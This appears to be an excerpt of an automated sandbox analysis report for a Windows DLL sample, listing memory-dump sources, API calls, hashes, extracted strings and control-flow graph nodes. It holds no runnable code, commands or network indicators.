                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: f16abf0805bd84f058cafe310b46289e38330846df98a34e9796a7024b4e3010
                              • Instruction ID: d96f5da85b9ebabdf3bac4c8cd9972c911bb35ed213589f2f54260a95ac5b772
                              • Opcode Fuzzy Hash: f16abf0805bd84f058cafe310b46289e38330846df98a34e9796a7024b4e3010
                              • Instruction Fuzzy Hash: AF312AB4608342EFC7108F28C588B4ABBF4EB89754F51895EF888C6361C371CA45AB57
                              APIs
                              • FindFirstFileA.KERNEL32(?,?), ref: 6C9BAEDC
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: 3da0e6fcc75042416382af3428b24e064930a11ec6833bb4953ebe2373421327
                              • Instruction ID: 983fd6d54fcf1ef04a82ae5d0795ff54252ee96e0d1ed7b2e4dcd8f04c0fb461
                              • Opcode Fuzzy Hash: 3da0e6fcc75042416382af3428b24e064930a11ec6833bb4953ebe2373421327
                              • Instruction Fuzzy Hash: 651166B0408341AFD7108B28D54449FBBE8BF86314F648E59F0A8DB690DB34CC948B26
                              APIs
                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C99ABA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                              • API String ID: 2738559852-1563143607
                              • Opcode ID: 934b7a4b53755c99f40fbb712f8fa55d32d0ee4972dc5c820e474d55cf43c50f
                              • Instruction ID: 9eadeac6ee753d295c716114c2fc81d1c0d68b4fbf5c9e7661db9de53e729ec5
                              • Opcode Fuzzy Hash: 934b7a4b53755c99f40fbb712f8fa55d32d0ee4972dc5c820e474d55cf43c50f
                              • Instruction Fuzzy Hash: 38624870A0D3818FC724CF18D490A5ABBF2ABDA314F288D1EE999CB751DB35D9458B43

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6824 6c9dcad3-6c9dcae3 6825 6c9dcafd-6c9dcaff 6824->6825 6826 6c9dcae5-6c9dcaf8 call 6c9cf9df call 6c9cf9cc 6824->6826 6828 6c9dcb05-6c9dcb0b 6825->6828 6829 6c9dce64-6c9dce71 call 6c9cf9df call 6c9cf9cc 6825->6829 6843 6c9dce7c 6826->6843 6828->6829 6832 6c9dcb11-6c9dcb37 6828->6832 6845 6c9dce77 call 6c9d0120 6829->6845 6832->6829 6833 6c9dcb3d-6c9dcb46 6832->6833 6836 6c9dcb48-6c9dcb5b call 6c9cf9df call 6c9cf9cc 6833->6836 6837 6c9dcb60-6c9dcb62 6833->6837 6836->6845 6841 6c9dcb68-6c9dcb6b 6837->6841 6842 6c9dce60-6c9dce62 6837->6842 6841->6842 6848 6c9dcb71-6c9dcb75 6841->6848 6847 6c9dce7f-6c9dce82 6842->6847 6843->6847 6845->6843 6848->6836 6851 6c9dcb77-6c9dcb8e 6848->6851 6853 6c9dcbdf-6c9dcbe5 6851->6853 6854 6c9dcb90-6c9dcb93 6851->6854 6855 6c9dcbab-6c9dcbc2 call 6c9cf9df call 6c9cf9cc call 6c9d0120 6853->6855 6856 6c9dcbe7-6c9dcbf1 6853->6856 6857 6c9dcb95-6c9dcb9e 6854->6857 6858 6c9dcba3-6c9dcba9 6854->6858 6888 6c9dcd97 6855->6888 6859 6c9dcbf8-6c9dcc16 call 6c9d47f5 call 6c9d47bb * 2 6856->6859 6860 6c9dcbf3-6c9dcbf5 6856->6860 6861 6c9dcc63-6c9dcc73 6857->6861 6858->6855 6862 6c9dcbc7-6c9dcbda 6858->6862 6898 6c9dcc18-6c9dcc2e call 6c9cf9cc call 6c9cf9df 6859->6898 6899 6c9dcc33-6c9dcc5c call 6c9dac69 6859->6899 6860->6859 6864 6c9dcc79-6c9dcc85 6861->6864 6865 6c9dcd38-6c9dcd41 call 6c9e19e5 6861->6865 6862->6861 6864->6865 6870 6c9dcc8b-6c9dcc8d 6864->6870 6877 6c9dcdb4 6865->6877 6878 6c9dcd43-6c9dcd55 6865->6878 6870->6865 6874 6c9dcc93-6c9dccb7 6870->6874 6874->6865 6879 6c9dccb9-6c9dcccf 6874->6879 6881 6c9dcdb8-6c9dcdd0 ReadFile 6877->6881 6878->6877 6883 6c9dcd57-6c9dcd66 GetConsoleMode 6878->6883 6879->6865 6884 6c9dccd1-6c9dccd3 6879->6884 6886 6c9dce2c-6c9dce37 GetLastError 6881->6886 6887 6c9dcdd2-6c9dcdd8 6881->6887 6883->6877 6889 6c9dcd68-6c9dcd6c 6883->6889 6884->6865 6890 6c9dccd5-6c9dccfb 6884->6890 6892 6c9dce39-6c9dce4b call 6c9cf9cc call 6c9cf9df 6886->6892 6893 6c9dce50-6c9dce53 6886->6893 6887->6886 6894 6c9dcdda 6887->6894 6896 6c9dcd9a-6c9dcda4 call 6c9d47bb 6888->6896 6889->6881 6895 6c9dcd6e-6c9dcd88 ReadConsoleW 6889->6895 6890->6865 6897 6c9dccfd-6c9dcd13 6890->6897 6892->6888 6906 6c9dce59-6c9dce5b 6893->6906 6907 6c9dcd90-6c9dcd96 call 6c9cf9f2 6893->6907 6902 6c9dcddd-6c9dcdef 6894->6902 6904 6c9dcda9-6c9dcdb2 6895->6904 6905 6c9dcd8a GetLastError 6895->6905 6896->6847 6897->6865 6909 6c9dcd15-6c9dcd17 6897->6909 6898->6888 6899->6861 6902->6896 6913 6c9dcdf1-6c9dcdf5 6902->6913 6904->6902 6905->6907 6906->6896 6907->6888 6909->6865 6910 6c9dcd19-6c9dcd33 6909->6910 6910->6865 6919 6c9dce0e-6c9dce19 6913->6919 6920 6c9dcdf7-6c9dce07 call 6c9dcefe 6913->6920 6925 6c9dce1b call 6c9dce83 6919->6925 6926 6c9dce25-6c9dce2a call 6c9dd1b6 6919->6926 6931 6c9dce0a-6c9dce0c 6920->6931 6932 6c9dce20-6c9dce23 6925->6932 6926->6932 6931->6896 6932->6931
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: c4056ebb1487898439a28177263355ba7c2fe56b4fc2e55b161e370ef4d393c4
                              • Instruction ID: 01fb819b5a7fc42ae9a91ce59c52a9a9083576eb55932a2ec9a1077ca7a5c318
                              • Opcode Fuzzy Hash: c4056ebb1487898439a28177263355ba7c2fe56b4fc2e55b161e370ef4d393c4
                              • Instruction Fuzzy Hash: 51C1E870A04B4A9FDF05DFA8C880BADBBB4AF5A318F218159E410B7781C774E945CF61

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6933 6c9e406c-6c9e409c call 6c9e44ec 6936 6c9e409e-6c9e40a9 call 6c9cf9df 6933->6936 6937 6c9e40b7-6c9e40c3 call 6c9e160c 6933->6937 6942 6c9e40ab-6c9e40b2 call 6c9cf9cc 6936->6942 6943 6c9e40dc-6c9e4125 call 6c9e4457 6937->6943 6944 6c9e40c5-6c9e40da call 6c9cf9df call 6c9cf9cc 6937->6944 6954 6c9e4391-6c9e4395 6942->6954 6952 6c9e4127-6c9e4130 6943->6952 6953 6c9e4192-6c9e419b GetFileType 6943->6953 6944->6942 6958 6c9e4167-6c9e418d GetLastError call 6c9cf9f2 6952->6958 6959 6c9e4132-6c9e4136 6952->6959 6955 6c9e419d-6c9e41ce GetLastError call 6c9cf9f2 CloseHandle 6953->6955 6956 6c9e41e4-6c9e41e7 6953->6956 6955->6942 6970 6c9e41d4-6c9e41df call 6c9cf9cc 6955->6970 6961 6c9e41e9-6c9e41ee 6956->6961 6962 6c9e41f0-6c9e41f6 6956->6962 6958->6942 6959->6958 6963 6c9e4138-6c9e4165 call 6c9e4457 6959->6963 6966 6c9e41fa-6c9e4248 call 6c9e17b0 6961->6966 6962->6966 6967 6c9e41f8 6962->6967 6963->6953 6963->6958 6976 6c9e424a-6c9e4256 call 6c9e4666 6966->6976 6977 6c9e4267-6c9e428f call 6c9e4710 6966->6977 6967->6966 6970->6942 6976->6977 6982 6c9e4258 6976->6982 6983 6c9e4294-6c9e42d5 6977->6983 6984 6c9e4291-6c9e4292 6977->6984 6985 6c9e425a-6c9e4262 call 6c9db925 6982->6985 6986 6c9e42f6-6c9e4304 6983->6986 6987 6c9e42d7-6c9e42db 6983->6987 6984->6985 6985->6954 6990 6c9e438f 6986->6990 6991 6c9e430a-6c9e430e 6986->6991 6987->6986 6989 6c9e42dd-6c9e42f1 6987->6989 6989->6986 6990->6954 6991->6990 6993 6c9e4310-6c9e4343 CloseHandle call 6c9e4457 6991->6993 6996 6c9e4377-6c9e438b 6993->6996 6997 6c9e4345-6c9e4371 GetLastError call 6c9cf9f2 call 6c9e171f 6993->6997 6996->6990 6997->6996
                              APIs
                                • Part of subcall function 6C9E4457: CreateFileW.KERNEL32(00000000,00000000,?,6C9E4115,?,?,00000000,?,6C9E4115,00000000,0000000C), ref: 6C9E4474
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9E4180
                              • __dosmaperr.LIBCMT ref: 6C9E4187
                              • GetFileType.KERNEL32(00000000), ref: 6C9E4193
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9E419D
                              • __dosmaperr.LIBCMT ref: 6C9E41A6
                              • CloseHandle.KERNEL32(00000000), ref: 6C9E41C6
                              • CloseHandle.KERNEL32(6C9DB0D0), ref: 6C9E4313
                              • GetLastError.KERNEL32 ref: 6C9E4345
                              • __dosmaperr.LIBCMT ref: 6C9E434C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: 8Q
                              • API String ID: 4237864984-4022487301
                              • Opcode ID: 8731c558dacfd09210ed97cc83a567fcda7d0603a3826fcc512cd6b42a1a92e6
                              • Instruction ID: 3d120fd4ae20808eac2f3ff8ec300f3f0bf341117945f7185c428e664e858fac
                              • Opcode Fuzzy Hash: 8731c558dacfd09210ed97cc83a567fcda7d0603a3826fcc512cd6b42a1a92e6
                              • Instruction Fuzzy Hash: FDA15A32A041459FCF0A8FA8CC517AE3BB5AF6B328F144259E821AF781D735D916CB52

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7002 6c99c1e0-6c99c239 call 6c9c6b70 7005 6c99c260-6c99c269 7002->7005 7006 6c99c26b-6c99c270 7005->7006 7007 6c99c2b0-6c99c2b5 7005->7007 7008 6c99c2f0-6c99c2f5 7006->7008 7009 6c99c272-6c99c277 7006->7009 7010 6c99c330-6c99c335 7007->7010 7011 6c99c2b7-6c99c2bc 7007->7011 7018 6c99c2fb-6c99c300 7008->7018 7019 6c99c431-6c99c448 WriteFile 7008->7019 7014 6c99c27d-6c99c282 7009->7014 7015 6c99c372-6c99c3df WriteFile 7009->7015 7012 6c99c489-6c99c4b9 call 6c9cb3a0 7010->7012 7013 6c99c33b-6c99c340 7010->7013 7016 6c99c2c2-6c99c2c7 7011->7016 7017 6c99c407-6c99c41b 7011->7017 7012->7005 7021 6c99c4be-6c99c4c3 7013->7021 7022 6c99c346-6c99c36d 7013->7022 7023 6c99c3e9-6c99c3fd WriteFile 7014->7023 7024 6c99c288-6c99c28d 7014->7024 7015->7023 7026 6c99c23b-6c99c250 7016->7026 7027 6c99c2cd-6c99c2d2 7016->7027 7025 6c99c41f-6c99c42c 7017->7025 7028 6c99c452-6c99c47f call 6c9cb920 ReadFile 7018->7028 7029 6c99c306-6c99c30b 7018->7029 7019->7028 7021->7005 7032 6c99c4c9-6c99c4d7 7021->7032 7030 6c99c253-6c99c258 7022->7030 7023->7017 7024->7005 7033 6c99c28f-6c99c2aa 7024->7033 7025->7005 7026->7030 7027->7005 7034 6c99c2d4-6c99c2e7 7027->7034 7028->7012 7029->7005 7036 6c99c311-6c99c32b 7029->7036 7030->7005 7033->7030 7034->7030 7036->7025
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: :uW$;uW$;uW$> 4!$> 4!
                              • API String ID: 0-4100612575
                              • Opcode ID: 1ab72d555d8dcb7c7476ecf421390fc58935475e59bc13c574f6195f47cfbec3
                              • Instruction ID: 298e81d56613637914ec7ffe79853b5b22250938bdc3cf16ed4adcfe6af653fb
                              • Opcode Fuzzy Hash: 1ab72d555d8dcb7c7476ecf421390fc58935475e59bc13c574f6195f47cfbec3
                              • Instruction Fuzzy Hash: 72717CB0208385AFD710DF55C980B6ABBF8BF8A708F54492EF498D6651D371D8489B93
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: K?Jo$K?Jo$`Rlx$7eO
                              • API String ID: 0-174837320
                              • Opcode ID: 7a28a30832a15c4c61f3e0c3b1cd59f5df35a3ec5ef27b741f54d30d90eeb9f3
                              • Instruction ID: 7a5c3ac38e7156aa3effa1c814a0230168c4c982886e006d18b83b47b6fd11eb
                              • Opcode Fuzzy Hash: 7a28a30832a15c4c61f3e0c3b1cd59f5df35a3ec5ef27b741f54d30d90eeb9f3
                              • Instruction Fuzzy Hash: 764256B4609342CFD764CF18C490A2ABBF5AFD9714F288E1EE59987B20D638D845CB53
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;T55
                              • API String ID: 0-2572755013
                              • Opcode ID: 749f8d475982ed16740027bfe7c2b4b027ad5a93bd6948465b5e967fd36e08ed
                              • Instruction ID: afa9662e1f6a92738e630c428530c929fd78a7207fc72d282671925e6dd55687
                              • Opcode Fuzzy Hash: 749f8d475982ed16740027bfe7c2b4b027ad5a93bd6948465b5e967fd36e08ed
                              • Instruction Fuzzy Hash: 7203E231645B018FC738CF28C9D0696B7E3AFE5328759CE6DC0A64BA95DB74B44ACB40

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7579 6c9c4ff0-6c9c5077 CreateProcessA 7580 6c9c50ca-6c9c50d3 7579->7580 7581 6c9c50d5-6c9c50da 7580->7581 7582 6c9c50f0-6c9c510b 7580->7582 7583 6c9c50dc-6c9c50e1 7581->7583 7584 6c9c5080-6c9c50c2 WaitForSingleObject CloseHandle * 2 7581->7584 7582->7580 7583->7580 7585 6c9c50e3-6c9c5118 7583->7585 7584->7580
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID: D
                              • API String ID: 963392458-2746444292
                              • Opcode ID: 4e02491ee34529bdaf0639b6145304d7aeca6d07272c480d24f72b39657587d9
                              • Instruction ID: ae037481394ddc1b268182c1095c81c7feed4bef9ec70dc4ef696e13e4f72eed
                              • Opcode Fuzzy Hash: 4e02491ee34529bdaf0639b6145304d7aeca6d07272c480d24f72b39657587d9
                              • Instruction Fuzzy Hash: BF310170909380CFD740DF28C19872ABBF0EB8A358F509A1DF89986250E775D5898F43

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7587 6c9dbc5e-6c9dbc7a 7588 6c9dbe39 7587->7588 7589 6c9dbc80-6c9dbc82 7587->7589 7590 6c9dbe3b-6c9dbe3f 7588->7590 7591 6c9dbca4-6c9dbcc5 7589->7591 7592 6c9dbc84-6c9dbc97 call 6c9cf9df call 6c9cf9cc call 6c9d0120 7589->7592 7593 6c9dbccc-6c9dbcd2 7591->7593 7594 6c9dbcc7-6c9dbcca 7591->7594 7609 6c9dbc9c-6c9dbc9f 7592->7609 7593->7592 7596 6c9dbcd4-6c9dbcd9 7593->7596 7594->7593 7594->7596 7598 6c9dbcdb-6c9dbce7 call 6c9dac69 7596->7598 7599 6c9dbcea-6c9dbcfb call 6c9dbe40 7596->7599 7598->7599 7607 6c9dbcfd-6c9dbcff 7599->7607 7608 6c9dbd3c-6c9dbd4e 7599->7608 7612 6c9dbd26-6c9dbd32 call 6c9dbeb1 7607->7612 7613 6c9dbd01-6c9dbd09 7607->7613 7610 6c9dbd95-6c9dbdb7 WriteFile 7608->7610 7611 6c9dbd50-6c9dbd59 7608->7611 7609->7590 7614 6c9dbdb9-6c9dbdbf GetLastError 7610->7614 7615 6c9dbdc2 7610->7615 7617 6c9dbd5b-6c9dbd5e 7611->7617 7618 6c9dbd85-6c9dbd93 call 6c9dc2c3 7611->7618 7621 6c9dbd37-6c9dbd3a 7612->7621 7619 6c9dbd0f-6c9dbd1c call 6c9dc25b 7613->7619 7620 6c9dbdcb-6c9dbdce 7613->7620 7614->7615 7622 6c9dbdc5-6c9dbdca 7615->7622 7624 6c9dbd75-6c9dbd83 call 6c9dc487 7617->7624 7625 6c9dbd60-6c9dbd63 7617->7625 7618->7621 7628 6c9dbd1f-6c9dbd21 7619->7628 7623 6c9dbdd1-6c9dbdd6 7620->7623 7621->7628 7622->7620 7629 6c9dbdd8-6c9dbddd 7623->7629 7630 6c9dbe34-6c9dbe37 7623->7630 7624->7621 7625->7623 7631 6c9dbd65-6c9dbd73 call 6c9dc39e 7625->7631 7628->7622 7635 6c9dbddf-6c9dbde4 7629->7635 7636 6c9dbe09-6c9dbe15 7629->7636 7630->7590 7631->7621 7641 6c9dbdfd-6c9dbe04 call 6c9cf9f2 7635->7641 7642 6c9dbde6-6c9dbdf8 call 6c9cf9cc call 6c9cf9df 7635->7642 7639 6c9dbe1c-6c9dbe2f call 6c9cf9cc call 6c9cf9df 7636->7639 7640 6c9dbe17-6c9dbe1a 7636->7640 7639->7609 7640->7588 7640->7639 7641->7609 7642->7609
                              APIs
                                • Part of subcall function 6C9DBEB1: GetConsoleCP.KERNEL32(?,6C9DB0D0,?), ref: 6C9DBEF9
                              • WriteFile.KERNEL32(?,?,6C9E46EC,00000000,00000000,?,00000000,00000000,6C9E5AB6,00000000,00000000,?,00000000,6C9DB0D0,6C9E46EC,00000000), ref: 6C9DBDAF
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C9E46EC,6C9DB0D0,00000000,?,?,?,?,00000000,?), ref: 6C9DBDB9
                              • __dosmaperr.LIBCMT ref: 6C9DBDFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ConsoleErrorFileLastWrite__dosmaperr
                              • String ID: 8Q
                              • API String ID: 251514795-4022487301
                              • Opcode ID: f463d1d98b4d28ef8627c5d441b2bfdbf480deeaef697b6fc935f04764769c82
                              • Instruction ID: 99172af25727992686ca62ce9bc08013d8c0b72ee5222ca88fa5a36ae2276a2b
                              • Opcode Fuzzy Hash: f463d1d98b4d28ef8627c5d441b2bfdbf480deeaef697b6fc935f04764769c82
                              • Instruction Fuzzy Hash: 1151E6B1A00A0AAFDF01DFA8C840BEEBB79EF1635CF168451E510B7A51D730F94587A1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7654 6c9c5b90-6c9c5b9c 7655 6c9c5bdd 7654->7655 7656 6c9c5b9e-6c9c5ba9 7654->7656 7659 6c9c5bdf-6c9c5c57 7655->7659 7657 6c9c5bbf-6c9c5bcc call 6c8901f0 call 6c9d0b18 7656->7657 7658 6c9c5bab-6c9c5bbd 7656->7658 7668 6c9c5bd1-6c9c5bdb 7657->7668 7658->7657 7661 6c9c5c59-6c9c5c81 7659->7661 7662 6c9c5c83-6c9c5c89 7659->7662 7661->7662 7664 6c9c5c8a-6c9c5d49 call 6c892250 call 6c892340 call 6c9c9379 call 6c88e010 call 6c9c7088 7661->7664 7668->7659
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9C5D31
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 323602529-1866435925
                              • Opcode ID: a797937d45d0896b2334ccfea244bc5d8476808ec5a91d7f337c582c99e7e815
                              • Instruction ID: bd992865c8fe6b31f6be9ecc4465c208a91b895f6250f31404b016dec0845557
                              • Opcode Fuzzy Hash: a797937d45d0896b2334ccfea244bc5d8476808ec5a91d7f337c582c99e7e815
                              • Instruction Fuzzy Hash: 3D5133B5600B008FD725CF19C585BA6BBF5FB58318F008A2DD8964BB90D775E90ACB91

